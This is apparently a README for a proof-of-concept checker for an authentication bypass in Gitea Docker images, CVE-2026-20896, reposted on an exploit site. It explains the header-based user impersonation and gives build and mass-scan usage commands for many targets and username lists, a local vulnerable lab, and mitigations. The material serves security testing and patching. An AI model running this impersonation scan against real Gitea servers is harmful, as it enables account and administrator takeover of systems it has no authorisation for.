Share
## https://sploitus.com/exploit?id=B63E3966-43C5-5FF1-BB9C-649838FB209E
# CVE-2026-20896 Gitea Docker Auth Bypass Checker

Authorized red team / pentest operations only.

This repository contains a minimal checker for CVE-2026-20896, an authentication bypass in official Gitea Docker images up to and including `1.26.2` when reverse-proxy authentication is enabled.

## What CVE-2026-20896 Is

Affected Gitea Docker images shipped an `app.ini` template with:

```ini
REVERSE_PROXY_TRUSTED_PROXIES = *
```

When an administrator enabled:

```ini
ENABLE_REVERSE_PROXY_AUTHENTICATION = true
```

Gitea trusted `X-WEBAUTH-USER` from any source IP that could reach the container HTTP port directly. A client that bypassed the intended authenticating reverse proxy could send a single header and impersonate a known or guessable user.

The practical impact is unauthenticated account impersonation. If the guessed user is an administrator, the worst case is full application-level takeover of the Gitea instance and its repositories. Host RCE is environment-dependent and is not claimed by this checker.

Patched versions start at `1.26.3`; upgrading to `1.26.4` or newer is recommended.

## How The PoC Works

The checker:

1. Fetches the target home page.
2. Looks for footer text such as `Powered by Gitea Version: 1.26.4`.
3. Skips testing by default if the parsed version is `>= 1.26.3`.
4. Sends `GET /` requests with `X-WEBAUTH-USER: ` for each supplied username.
5. Reports a hit when the returned page title looks like a logged-in dashboard for that user.

The Go version supports multiple targets, username files, concurrency, timeouts, JSONL output, TLS `--insecure`, `--dry-run`, and `--force`.

## Build

```bash
go build -o gitea-cve-2026-20896-check .
```

No third-party Go dependencies are required.

## Usage

Single target:

```bash
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,gitea_admin,alice
```

Multiple targets and usernames:

```bash
./gitea-cve-2026-20896-check \
  --targets targets.txt \
  --user-file users.txt \
  --concurrency 64 \
  --timeout 8s \
  --jsonl
```

Dry run:

```bash
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,alice \
  --dry-run
```

Bash fallback:

```bash
./poc.sh --url http://localhost:3000 --users admin,alice
```

## Exit Codes

- `0`: at least one vulnerable impersonation was confirmed
- `1`: no vulnerable impersonation was confirmed
- `2`: usage, input, or runtime error

## Local Reproduction Lab

The following lab starts an affected local Gitea container and creates a test user:

```bash
docker run -d --name gitea-cve-2026-20896 \
  -p 127.0.0.1:3000:3000 \
  -e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \
  -e GITEA__security__INSTALL_LOCK=true \
  gitea/gitea:1.26.2

sleep 15

docker exec --user git gitea-cve-2026-20896 gitea admin user create \
  --username alice \
  --password 'longpasswordhere1234' \
  --email alice@example.test \
  --must-change-password=false

./gitea-cve-2026-20896-check --url http://localhost:3000 --users bob,alice,admin
```

Expected positive result:

```text
[VULNERABLE] http://localhost:3000 user=alice title="alice - Dashboard - Gitea: Git with a cup of tea"
```

Cleanup:

```bash
docker rm -f gitea-cve-2026-20896
```

## Mitigation

- Upgrade Gitea to `1.26.3` or newer; `1.26.4` or newer is preferred.
- Do not expose the backend Gitea container HTTP port directly to untrusted networks.
- Explicitly configure trusted reverse proxies.
- Keep reverse-proxy authentication disabled unless the network path and proxy trust boundary are understood.

## References

- Gitea advisory: 
- Gitea release notes for `1.26.3` / `1.26.4`: 
- Fix PR: 
- CVE record: 
- In-the-wild probing report via The Hacker News / Sysdig telemetry: